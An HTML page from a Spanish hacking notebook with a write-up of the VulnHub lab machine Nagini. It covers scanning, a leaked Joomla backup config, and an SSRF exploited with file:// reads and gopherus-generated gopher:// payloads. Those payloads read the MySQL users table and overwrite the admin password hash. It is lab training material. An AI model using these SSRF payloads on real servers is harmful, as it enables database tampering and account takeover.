<!DOCTYPE HTML>
<html lang="es" class="sidebar-visible no-js ayu">
    <head>
        <!-- Book generated using mdBook -->
        <meta charset="UTF-8">
        <title>Nagini - Secronomicón</title>
        <!-- Custom HTML head -->
        <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
        <meta name="description" content="Libro de notas donde encontrarás cada truco/técnica/guía de hacking que he aprendido y recolectado de CTFS, aplicaciones reales, lectura de writeups y noticias.">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="theme-color" content="#ffffff" />

        <link rel="icon" href="../../../favicon.svg">
        <link rel="shortcut icon" href="../../../favicon.png">
        <link rel="stylesheet" href="../../../css/variables.css">
        <link rel="stylesheet" href="../../../css/general.css">
        <link rel="stylesheet" href="../../../css/chrome.css">
        <link rel="stylesheet" href="../../../css/print.css" media="print">
        <!-- Fonts -->
        <link rel="stylesheet" href="../../../FontAwesome/css/font-awesome.css">
        <link rel="stylesheet" href="../../../fonts/fonts.css">
        <!-- Highlight.js Stylesheets -->
        <link rel="stylesheet" href="../../../highlight.css">
        <link rel="stylesheet" href="../../../tomorrow-night.css">
        <link rel="stylesheet" href="../../../ayu-highlight.css">

        <!-- Custom theme stylesheets -->
    </head>
    <body>
        <!-- Provide site root to javascript -->
        <script type="text/javascript">
            var path_to_root = "../../../";
            var default_theme = window.matchMedia("(prefers-color-scheme: dark)").matches ? "ayu" : "ayu";
        </script>

        <!-- Work around some values being stored in localStorage wrapped in quotes -->
        <script type="text/javascript">
            try {
                var theme = localStorage.getItem('mdbook-theme');
                var sidebar = localStorage.getItem('mdbook-sidebar');

                if (theme.startsWith('"') && theme.endsWith('"')) {
                    localStorage.setItem('mdbook-theme', theme.slice(1, theme.length - 1));
                }

                if (sidebar.startsWith('"') && sidebar.endsWith('"')) {
                    localStorage.setItem('mdbook-sidebar', sidebar.slice(1, sidebar.length - 1));
                }
            } catch (e) { }
        </script>

        <!-- Set the theme before any content is loaded, prevents flash -->
        <script type="text/javascript">
            var theme;
            try { theme = localStorage.getItem('mdbook-theme'); } catch(e) { }
            if (theme === null || theme === undefined) { theme = default_theme; }
            var html = document.querySelector('html');
            html.classList.remove('no-js')
            html.classList.remove('ayu')
            html.classList.add(theme);
            html.classList.add('js');
        </script>

        <!-- Hide / unhide sidebar before it is displayed -->
        <script type="text/javascript">
            var html = document.querySelector('html');
            var sidebar = 'hidden';
            if (document.body.clientWidth >= 1080) {
                try { sidebar = localStorage.getItem('mdbook-sidebar'); } catch(e) { }
                sidebar = sidebar || 'visible';
            }
            html.classList.remove('sidebar-visible');
            html.classList.add("sidebar-" + sidebar);
        </script>

        <nav id="sidebar" class="sidebar" aria-label="Table of contents">
            <div class="sidebar-scrollbox">
                <ol class="chapter"><li class="chapter-item expanded affix "><a href="../../../index.html">Secronomicón</a></li><li class="chapter-item expanded affix "><li class="part-title">Guías / Cursos</li><li class="chapter-item expanded "><a href="../../../guides/oscp_bof/index.html"><strong aria-hidden="true">1.</strong> OSCP Buffer Overflow</a></li><li class="chapter-item expanded "><div><strong aria-hidden="true">2.</strong> Port Swigger Academy</div></li><li><ol class="section"><li class="chapter-item expanded "><a href="../../../guides/port_swigger_academy/sql_injection.html"><strong aria-hidden="true">2.1.</strong> SQL Injection</a></li></ol></li><li class="chapter-item expanded "><a href="../../../guides/pwncollege/index.html"><strong aria-hidden="true">3.</strong> PwnCollege</a></li><li><ol class="section"><li class="chapter-item expanded "><a href="../../../guides/pwncollege/0_module/index.html"><strong aria-hidden="true">3.1.</strong> Módulo 0</a></li></ol></li><li class="chapter-item expanded "><a href="../../../guides/active_directory/index.html"><strong aria-hidden="true">4.</strong> Active Directory</a></li><li><ol class="section"><li class="chapter-item expanded "><a href="../../../guides/active_directory/0_general.html"><strong aria-hidden="true">4.1.</strong> Teoría General</a></li><li class="chapter-item expanded "><a href="../../../guides/active_directory/1_attacking.html"><strong aria-hidden="true">4.2.</strong> Atacando Active Directory</a></li></ol></li><li class="chapter-item expanded "><a href="../../../guides/ecpptv2_lab/index.html"><strong aria-hidden="true">5.</strong> eCPPTv2 s4viLab</a></li><li><ol class="section"><li class="chapter-item expanded "><a href="../../../guides/ecpptv2_lab/1_aragog/index.html"><strong aria-hidden="true">5.1.</strong> Aragog</a></li><li class="chapter-item expanded "><a href="../../../guides/ecpptv2_lab/2_nagini/index.html" class="active"><strong aria-hidden="true">5.2.</strong> Nagini</a></li><li class="chapter-item expanded "><a href="../../../guides/ecpptv2_lab/3_fawkes/index.html"><strong aria-hidden="true">5.3.</strong> Fawkes</a></li><li class="chapter-item expanded "><div><strong aria-hidden="true">5.4.</strong> Matrix 1</div></li><li class="chapter-item expanded "><div><strong aria-hidden="true">5.5.</strong> Brainpan</div></li></ol></li><li class="chapter-item expanded "><a href="../../../guides/nightmare/index.html"><strong aria-hidden="true">6.</strong> Nightmare</a></li><li class="chapter-item expanded affix "><li class="part-title">Misc</li><li class="chapter-item expanded "><a href="../../../templates/index.html"><strong aria-hidden="true">7.</strong> Templates</a></li><li class="chapter-item expanded affix "><li class="part-title">Cheat Sheets</li><li class="chapter-item expanded "><a href="../../../cheat_sheets/general.html"><strong aria-hidden="true">8.</strong> General</a></li><li class="chapter-item expanded "><a href="../../../cheat_sheets/active_directory.html"><strong aria-hidden="true">9.</strong> Active Directory</a></li><li class="chapter-item expanded "><a href="../../../cheat_sheets/network/general.html"><strong aria-hidden="true">10.</strong> Network</a></li><li><ol class="section"><li class="chapter-item expanded "><a href="../../../cheat_sheets/network/pivoting.html"><strong aria-hidden="true">10.1.</strong> Pivoting</a></li></ol></li><li class="chapter-item expanded "><div><strong aria-hidden="true">11.</strong> Pwning</div></li><li><ol class="section"><li class="chapter-item expanded "><a href="../../../cheat_sheets/pwning/linux.html"><strong aria-hidden="true">11.1.</strong> Linux pwning</a></li><li class="chapter-item expanded "><a href="../../../cheat_sheets/pwning/bof-oscp.html"><strong aria-hidden="true">11.2.</strong> OSCP Buffer Overflow</a></li></ol></li><li class="chapter-item expanded "><a href="../../../cheat_sheets/fuzzing.html"><strong aria-hidden="true">12.</strong> Fuzzing</a></li><li class="chapter-item expanded "><a href="../../../cheat_sheets/inyecciones.html"><strong aria-hidden="true">13.</strong> Inyecciones</a></li><li class="chapter-item expanded "><a href="../../../cheat_sheets/transfer.html"><strong aria-hidden="true">14.</strong> Transferencia de archivos</a></li><li class="chapter-item expanded affix "><li class="part-title">CTFs</li><li class="chapter-item expanded "><a href="../../../ctfs/20220922_ctf-core2022/index.html"><strong aria-hidden="true">15.</strong> 22/09/2022 - IPN Core 2022 CTF</a></li><li class="chapter-item expanded affix "><li class="part-title">Hack The Box</li><li class="chapter-item expanded "><div><strong aria-hidden="true">16.</strong> Battlegrounds</div></li><li><ol class="section"><li class="chapter-item expanded "><a href="../../../htb/battlegrounds/mayhem/index.html"><strong aria-hidden="true">16.1.</strong> Cyber Mayhem</a></li></ol></li><li class="chapter-item expanded "><div><strong aria-hidden="true">17.</strong> Challenges</div></li><li class="chapter-item expanded "><div><strong aria-hidden="true">18.</strong> Boxes</div></li><li><ol class="section"><li class="chapter-item expanded "><div><strong aria-hidden="true">18.1.</strong> Linux</div></li><li><ol class="section"><li class="chapter-item expanded "><div><strong aria-hidden="true">18.1.1.</strong> Fácil</div></li><li class="chapter-item expanded "><div><strong aria-hidden="true">18.1.2.</strong> Medio</div></li><li class="chapter-item expanded "><div><strong aria-hidden="true">18.1.3.</strong> Difícil</div></li><li class="chapter-item expanded "><div><strong aria-hidden="true">18.1.4.</strong> Locura</div></li></ol></li><li class="chapter-item expanded "><div><strong aria-hidden="true">18.2.</strong> Windows</div></li><li><ol class="section"><li class="chapter-item expanded "><div><strong aria-hidden="true">18.2.1.</strong> Fácil</div></li><li><ol class="section"><li class="chapter-item expanded "><a href="../../../htb/boxes/windows/1_facil/Active/index.html"><strong aria-hidden="true">18.2.1.1.</strong> Active</a></li><li class="chapter-item expanded "><a href="../../../htb/boxes/windows/1_facil/Devel/index.html"><strong aria-hidden="true">18.2.1.2.</strong> Devel</a></li><li class="chapter-item expanded "><a href="../../../htb/boxes/windows/1_facil/Remote/index.html"><strong aria-hidden="true">18.2.1.3.</strong> Remote</a></li><li class="chapter-item expanded "><a href="../../../htb/boxes/windows/1_facil/Access/index.html"><strong aria-hidden="true">18.2.1.4.</strong> Access</a></li></ol></li><li class="chapter-item expanded "><div><strong aria-hidden="true">18.2.2.</strong> Medio</div></li><li><ol class="section"><li class="chapter-item expanded "><a href="../../../htb/boxes/windows/2_medio/Chatterbox/index.html"><strong aria-hidden="true">18.2.2.1.</strong> Chatterbox</a></li><li class="chapter-item expanded "><a href="../../../htb/boxes/windows/2_medio/Jeeves/index.html"><strong aria-hidden="true">18.2.2.2.</strong> Jeeves</a></li><li class="chapter-item expanded "><a href="../../../htb/boxes/windows/2_medio/SecNotes/index.html"><strong aria-hidden="true">18.2.2.3.</strong> SecNotes</a></li><li class="chapter-item expanded "><a href="../../../htb/boxes/windows/2_medio/Silo/index.html"><strong aria-hidden="true">18.2.2.4.</strong> Silo</a></li></ol></li><li class="chapter-item expanded "><div><strong aria-hidden="true">18.2.3.</strong> Difícil</div></li><li><ol class="section"><li class="chapter-item expanded "><a href="../../../htb/boxes/windows/3_dificil/Control/index.html"><strong aria-hidden="true">18.2.3.1.</strong> Control</a></li><li class="chapter-item expanded "><a href="../../../htb/boxes/windows/3_dificil/Search/index.html"><strong aria-hidden="true">18.2.3.2.</strong> Search</a></li></ol></li><li class="chapter-item expanded "><div><strong aria-hidden="true">18.2.4.</strong> Locura</div></li></ol></li></ol></li><li class="chapter-item expanded "><li class="part-title">echoCTF</li><li class="chapter-item expanded "><div><strong aria-hidden="true">19.</strong> Challenges</div></li><li class="chapter-item expanded "><div><strong aria-hidden="true">20.</strong> Networks</div></li><li class="chapter-item expanded "><div><strong aria-hidden="true">21.</strong> Targets</div></li><li><ol class="section"><li class="chapter-item expanded "><div><strong aria-hidden="true">21.1.</strong> Principiante</div></li><li class="chapter-item expanded "><div><strong aria-hidden="true">21.2.</strong> Básico</div></li><li><ol class="section"><li class="chapter-item expanded "><a href="../../../echoCTF/targets/2_basic/Flanders/index.html"><strong aria-hidden="true">21.2.1.</strong> Flanders</a></li><li class="chapter-item expanded "><a href="../../../echoCTF/targets/2_basic/Smithers/index.html"><strong aria-hidden="true">21.2.2.</strong> Smithers</a></li></ol></li><li class="chapter-item expanded "><div><strong aria-hidden="true">21.3.</strong> Intermedio</div></li><li class="chapter-item expanded "><div><strong aria-hidden="true">21.4.</strong> Avanzado</div></li><li class="chapter-item expanded "><div><strong aria-hidden="true">21.5.</strong> Experto</div></li><li><ol class="section"><li class="chapter-item expanded "><a href="../../../echoCTF/targets/5_expert/gogo-yubari/index.html"><strong aria-hidden="true">21.5.1.</strong> Gogo Yubari</a></li><li class="chapter-item expanded "><a href="../../../echoCTF/targets/5_expert/hajmetr/index.html"><strong aria-hidden="true">21.5.2.</strong> Hajmetr</a></li></ol></li><li class="chapter-item expanded "><div><strong aria-hidden="true">21.6.</strong> Guru</div></li></ol></li></ol>
            </div>
            <div id="sidebar-resize-handle" class="sidebar-resize-handle"></div>
        </nav>

        <div id="page-wrapper" class="page-wrapper">

            <div class="page">
                <div id="menu-bar-hover-placeholder"></div>
                <div id="menu-bar" class="menu-bar sticky bordered">
                    <div class="left-buttons">
                        <button id="sidebar-toggle" class="icon-button" type="button" title="Toggle Table of Contents" aria-label="Toggle Table of Contents" aria-controls="sidebar">
                            <i class="fa fa-bars"></i>
                        </button>
                        <button id="theme-toggle" class="icon-button" type="button" title="Change theme" aria-label="Change theme" aria-haspopup="true" aria-expanded="false" aria-controls="theme-list">
                            <i class="fa fa-paint-brush"></i>
                        </button>
                        <ul id="theme-list" class="theme-popup" aria-label="Themes" role="menu">
                            <li role="none"><button role="menuitem" class="theme" id="light">Light</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="rust">Rust</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="coal">Coal</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="navy">Navy</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="ayu">Ayu (default)</button></li>
                        </ul>
                        <button id="search-toggle" class="icon-button" type="button" title="Search. (Shortkey: s)" aria-label="Toggle Searchbar" aria-expanded="false" aria-keyshortcuts="S" aria-controls="searchbar">
                            <i class="fa fa-search"></i>
                        </button>
                    </div>

                    <h1 class="menu-title">Secronomicón</h1>

                    <div class="right-buttons">
                        <a href="../../../print.html" title="Print this book" aria-label="Print this book">
                            <i id="print-button" class="fa fa-print"></i>
                        </a>
                    </div>
                </div>

                <div id="search-wrapper" class="hidden">
                    <form id="searchbar-outer" class="searchbar-outer">
                        <input type="search" id="searchbar" name="searchbar" placeholder="Search this book ..." aria-controls="searchresults-outer" aria-describedby="searchresults-header">
                    </form>
                    <div id="searchresults-outer" class="searchresults-outer hidden">
                        <div id="searchresults-header" class="searchresults-header"></div>
                        <ul id="searchresults">
                        </ul>
                    </div>
                </div>
                <!-- Apply ARIA attributes after the sidebar and the sidebar toggle button are added to the DOM -->
                <script type="text/javascript">
                    document.getElementById('sidebar-toggle').setAttribute('aria-expanded', sidebar === 'visible');
                    document.getElementById('sidebar').setAttribute('aria-hidden', sidebar !== 'visible');
                    Array.from(document.querySelectorAll('#sidebar a')).forEach(function(link) {
                        link.setAttribute('tabIndex', sidebar === 'visible' ? 0 : -1);
                    });
                </script>

                <div id="content" class="content">
                    <main>
                        <h1 id="nagini"><a class="header" href="#nagini">Nagini</a></h1>
<p>Write-up de la máquina nagini de la plataforma <a href="https://www.vulnhub.com">vulnhub</a> (en un ejercicio de laboratorio para eCPPTv2).</p>
<p><img src="images/cover.jpg" alt="Nagini cover" /></p>
<h2 id="tabla-de-contenido"><a class="header" href="#tabla-de-contenido">Tabla de Contenido <!-- omit from toc --></a></h2>
<ul>
<li><a href="#introducci%C3%B3n">Introducción</a>
<ul>
<li><a href="#t%C3%A9cnicas-vistas--tags">Técnicas vistas / Tags</a></li>
<li><a href="#estad%C3%ADsticas">Estadísticas</a></li>
</ul>
</li>
<li><a href="#reconocimiento">Reconocimiento</a>
<ul>
<li><a href="#escaneo-de-host">Escaneo de host</a>
<ul>
<li><a href="#escaneo-completo-de-puertos">Escaneo completo de puertos</a></li>
<li><a href="#escaneo-espec%C3%ADfico">Escaneo específico</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#enumeraci%C3%B3n">Enumeración</a>
<ul>
<li><a href="#servicios">Servicios</a>
<ul>
<li><a href="#http---80">http - 80</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#explotaci%C3%B3n">Explotación</a>
<ul>
<li><a href="#ssrf">SSRF</a></li>
</ul>
</li>
<li><a href="#post-explotaci%C3%B3n">Post Explotación</a>
<ul>
<li><a href="#escalaci%C3%B3n-de-privilegios">Escalación de privilegios</a>
<ul>
<li><a href="#www-data--snape">www-data → snape</a></li>
<li><a href="#www-data--hermoine">www-data → hermoine</a></li>
<li><a href="#hermoine--root">hermoine → root</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#notas-adicionales">Notas adicionales</a></li>
<li><a href="#referencias">Referencias</a></li>
</ul>
<h2 id="introducción"><a class="header" href="#introducción">Introducción</a></h2>
<h3 id="técnicas-vistas--tags"><a class="header" href="#técnicas-vistas--tags">Técnicas vistas / Tags</a></h3>
<ul>
<li>Joomla</li>
<li>HTTP3</li>
<li>quic</li>
<li>SSRF - Server Side Request Forgery</li>
<li>gopher</li>
<li>SUID cp</li>
<li>firepwd</li>
<li>Firefox password cracking</li>
</ul>
<h3 id="estadísticas"><a class="header" href="#estadísticas">Estadísticas</a></h3>
<div class="table-wrapper"><table><thead><tr><th>Característica</th><th>Descripción</th></tr></thead><tbody>
<tr><td>Nombre</td><td><a href="https://www.vulnhub.com/entry/harrypotter-nagini,689/">Nagini</a></td></tr>
<tr><td>OS</td><td>Linux</td></tr>
<tr><td>Dificultad asignada</td><td>Media</td></tr>
<tr><td>Creadores</td><td><a href="https://www.vulnhub.com/author/mansoor-r,794/">Mansoor R</a></td></tr>
</tbody></table>
</div>
<h2 id="reconocimiento"><a class="header" href="#reconocimiento">Reconocimiento</a></h2>
<h3 id="escaneo-de-host"><a class="header" href="#escaneo-de-host">Escaneo de host</a></h3>
<h4 id="escaneo-completo-de-puertos"><a class="header" href="#escaneo-completo-de-puertos">Escaneo completo de puertos</a></h4>
<pre><code class="language-bash">subnet=&quot;10.10.0.&quot; &amp;&amp; for ip in {0..254}; do ping -c 1 -t 1 $subnet$ip &gt; /dev/null &amp;&amp; echo &quot;[+] Host found $subnet$ip&quot;; done
[+] Host found 10.10.0.128 # Aragog
[+] Host found 10.10.0.129

└─$ nmap -sT --min-rate 5000 -v -p- -open -oG nmap/all_ports_st $TARGET
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-07 20:43 EST
Initiating Ping Scan at 20:43
Scanning 10.10.0.129 [2 ports]
Completed Ping Scan at 20:43, 2.26s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:43
Completed Parallel DNS resolution of 1 host. at 20:43, 2.01s elapsed
Initiating Connect Scan at 20:43
Scanning 10.10.0.129 [65535 ports]
Discovered open port 22/tcp on 10.10.0.129
Discovered open port 80/tcp on 10.10.0.129
Completed Connect Scan at 20:44, 44.54s elapsed (65535 total ports)
Nmap scan report for 10.10.0.129
Host is up (0.00053s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 48.89 seconds
</code></pre>
<h4 id="escaneo-específico"><a class="header" href="#escaneo-específico">Escaneo específico</a></h4>
<pre><code class="language-bash">└─$ nmap -sCV -p 22,80 -open -oN nmap/targeted $TARGET
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-07 20:45 EST
Nmap scan report for 10.10.0.129
Host is up (0.00082s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 48:df:48:37:25:94:c4:74:6b:2c:62:73:bf:b4:9f:a9 (RSA)
|   256 1e:34:18:17:5e:17:95:8f:70:2f:80:a6:d5:b4:17:3e (ECDSA)
|_  256 3e:79:5f:55:55:3b:12:75:96:b4:3e:e3:83:7a:54:94 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.73 seconds
</code></pre>
<h2 id="enumeración"><a class="header" href="#enumeración">Enumeración</a></h2>
<h3 id="servicios"><a class="header" href="#servicios">Servicios</a></h3>
<h4 id="http---80"><a class="header" href="#http---80">http - 80</a></h4>
<p>Después de realizar ejecutar <code>ffuf</code> se identificaron las rutas:</p>
<ul>
<li><code>/note.txt</code>.</li>
<li><code>/joomla</code>.</li>
</ul>
<p>Donde en el contenido de la ruta <code>/note.txt</code> hace referencia a que se encuentra ejecutándose un servidor web de tipo quic.</p>
<pre><code class="language-text">Hello developers!!


I will be using our new HTTP3 Server at https://quic.nagini.hogwarts for further communications.
All developers are requested to visit the server regularly for checking latest announcements.


Regards,
site_amdin
</code></pre>
<p>Y la ruta de <code>/joomla</code> expone un gestor de contenido. Al ejecutar <code>joomscan</code> se identificó un archivo de configuración respaldado.</p>
<pre><code class="language-bash">└─$ joomscan --ec -u &quot;http://10.10.0.129/joomla&quot;
    ____  _____  _____  __  __  ___   ___    __    _  _
   (_  _)(  _  )(  _  )(  \/  )/ __) / __)  /__\  ( \( )
  .-_)(   )(_)(  )(_)(  )    ( \__ \( (__  /(__)\  )  (
  \____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
                        (1337.today)

... Datos truncados

[+] Checking sensitive config.php.x file
[++] Readable config file is found
 config file path : http://10.10.0.129/joomla/configuration.php.bak
</code></pre>
<p>Dada la extención se pudo visualizar su contenido.</p>
<pre><code class="language-bash">└─$ curl http://10.10.0.129/joomla/configuration.php.bak
&lt;?php
class JConfig {
        public $offline = '0';
        public $offline_message = 'This site is down for maintenance.&lt;br /&gt;Please check back again soon.';
        public $display_offline_message = '1';
        public $offline_image = '';
        public $sitename = 'Joomla CMS';
        public $editor = 'tinymce';
        public $captcha = '0';
        public $list_limit = '20';
        public $access = '1';
        public $debug = '0';
        public $debug_lang = '0';
        public $debug_lang_const = '1';
        public $dbtype = 'mysqli';
        public $host = 'localhost';
        public $user = 'goblin';
        public $password = '';
        public $db = 'joomla';
        public $dbprefix = 'joomla_';
        public $live_site = '';
        public $secret = 'ILhwP6HTYKcN7qMh';
        public $gzip = '0';
        public $error_reporting = 'default';
        public $helpurl = 'https://help.joomla.org/proxy?keyref=Help{major}{minor}:{keyref}&amp;lang={langcode}';
        public $ftp_host = '';
        public $ftp_port = '';
        public $ftp_user = '';
        public $ftp_pass = '';
        public $ftp_root = '';
        public $ftp_enable = '0';
        public $offset = 'UTC';
        public $mailonline = '1';
        public $mailer = 'mail';
        public $mailfrom = 'site_admin@nagini.hogwarts';
        public $fromname = 'Joomla CMS';
        public $sendmail = '/usr/sbin/sendmail';
        public $smtpauth = '0';
        public $smtpuser = '';
        public $smtppass = '';
        public $smtphost = 'localhost';
        public $smtpsecure = 'none';
        public $smtpport = '25';
        public $caching = '0';
        public $cache_handler = 'file';
        public $cachetime = '15';
        public $cache_platformprefix = '0';
        public $MetaDesc = '';
        public $MetaKeys = '';
        public $MetaTitle = '1';
        public $MetaAuthor = '1';
        public $MetaVersion = '0';
        public $robots = '';
        public $sef = '1';
        public $sef_rewrite = '0';
        public $sef_suffix = '0';
        public $unicodeslugs = '0';
        public $feed_limit = '10';
        public $feed_email = 'none';
        public $log_path = '/var/www/html/joomla/administrator/logs';
        public $tmp_path = '/var/www/html/joomla/tmp';
        public $lifetime = '15';
        public $session_handler = 'database';
        public $shared_session = '0';
}
</code></pre>
<p>Posterior a la mención del servidor HTTP3 se buscó información al respecto y se encontró <a href="https://github.com/cloudflare/quiche">un cliente</a> que permite la interacción con el servidor. Al realizar la instalación y navegar por medio de este, se obtuvo la siguiente página, exponiendo una ruta en el servidor web incial.</p>
<pre><code class="language-bash">└─$ ./http3-client https://10.10.0.129
&lt;html&gt;
        &lt;head&gt;
        &lt;title&gt;Information Page&lt;/title&gt;
        &lt;/head&gt;
        &lt;body&gt;
                Greetings Developers!!

                I am having two announcements that I need to share with you:

                1. We no longer require functionality at /internalResourceFeTcher.php in our main production servers.So I will be removing the same by this week.
                2. All developers are requested not to put any configuration's backup file (.bak) in main production servers as they are readable by every one.


                Regards,
                site_admin
        &lt;/body&gt;
&lt;/html&gt;
</code></pre>
<h2 id="explotación"><a class="header" href="#explotación">Explotación</a></h2>
<h3 id="ssrf"><a class="header" href="#ssrf">SSRF</a></h3>
<p>Al identificar la vulnerabilidad y poder obtener archivos mediante payloads como <code>file:///etc/passwd</code> , descubrimiento de puertos internos abiertos, etc. se identificó la herramienta <code>gopherus</code> que permite generar payloads para establecer conexiones y poder enumerar otros tipos de servicios mediante el protocolo <code>gopher://</code> y dado que se cuenta con credenciales de la base de datos local se hizo uso de esta para buscar dentro de esta.</p>
<pre><code class="language-bash">└─$ python gopherus.py --exploit mysql


  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
\    \_\  (  &lt;_&gt; )  |_&gt; &gt;   Y  \  ___/|  | \/  |  /\___ \
 \______  /\____/|   __/|___|  /\___  &gt;__|  |____//____  &gt;
        \/       |__|        \/     \/                 \/

                author: $_SpyD3r_$

For making it work username should not be password protected!!!

Give MySQL username: goblin
Give query to execute: show databases;

Your gopher link is ready to do SSRF : 

gopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%67%6f%62%6c%69%6e%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%10%00%00%00%03%73%68%6f%77%20%64%61%74%61%62%61%73%65%73%3b%01%00%00%00%01

-----------Made-by-SpyD3r-----------
</code></pre>
<p>Sin embargo, a pesar de contar con el payload adecuado, se tuvo que mandar múltiples veces ya que no siempre fue interpretado.</p>
<p><img src="images/exploit_1.png" alt="Lista de bases de datos" /></p>
<p>Posteriormente se extrajo el hash del usuario administrador de joomla, mediante:</p>
<pre><code class="language-bash">└─$ python gopherus.py --exploit mysql


  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
\    \_\  (  &lt;_&gt; )  |_&gt; &gt;   Y  \  ___/|  | \/  |  /\___ \
 \______  /\____/|   __/|___|  /\___  &gt;__|  |____//____  &gt;
        \/       |__|        \/     \/                 \/

                author: $_SpyD3r_$

For making it work username should not be password protected!!!

Give MySQL username: goblin
Give query to execute: use joomla;select username,password from joomla_users;

Your gopher link is ready to do SSRF :

gopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%67%6f%62%6c%69%6e%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%37%00%00%00%03%75%73%65%20%6a%6f%6f%6d%6c%61%3b%73%65%6c%65%63%74%20%75%73%65%72%6e%61%6d%65%2c%70%61%73%73%77%6f%72%64%20%66%72%6f%6d%20%6a%6f%6f%6d%6c%61%5f%75%73%65%72%73%3b%01%00%00%00%01

-----------Made-by-SpyD3r-----------
</code></pre>
<p><img src="images/exploit_2.png" alt="Hash de usuario de joomla" /></p>
<p>Para posteriormente crackearlo haciéndo uso de <code>jhon</code>, sin embargo, no fue satisfactorio el proceso por lo que se intentó modificar el hash del usuario identificado en la base de datos, generando un hash previamente.</p>
<pre><code class="language-bash">└─$ echo -n 'srrequiem' | md5sum
7482dd7f2bbb7f277796bcdfb52e717e  -
</code></pre>
<p>Para después sustituir su valor por el hash actual, mediante la consulta.</p>
<pre><code class="language-bash">└─$ python gopherus.py --exploit mysql


  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
\    \_\  (  &lt;_&gt; )  |_&gt; &gt;   Y  \  ___/|  | \/  |  /\___ \
 \______  /\____/|   __/|___|  /\___  &gt;__|  |____//____  &gt;
        \/       |__|        \/     \/                 \/

                author: $_SpyD3r_$

For making it work username should not be password protected!!!

Give MySQL username: goblin
Give query to execute: use joomla;update joomla_users set password = '7482dd7f2bbb7f277796bcdfb52e717e' where username = 'site_admin';

Your gopher link is ready to do SSRF :

gopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%67%6f%62%6c%69%6e%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%70%00%00%00%03%75%73%65%20%6a%6f%6f%6d%6c%61%3b%75%70%64%61%74%65%20%6a%6f%6f%6d%6c%61%5f%75%73%65%72%73%20%73%65%74%20%70%61%73%73%77%6f%72%64%20%3d%20%27%37%34%38%32%64%64%37%66%32%62%62%62%37%66%32%37%37%37%39%36%62%63%64%66%62%35%32%65%37%31%37%65%27%20%77%68%65%72%65%20%75%73%65%72%6e%61%6d%65%20%3d%20%27%73%69%74%65%5f%61%64%6d%69%6e%27%3b%01%00%00%00%01

-----------Made-by-SpyD3r-----------
</code></pre>
<p>Logrando así acceder al panel de joomla.</p>
<p><img src="images/exploit_3.png" alt="Panel de joomla" /></p>
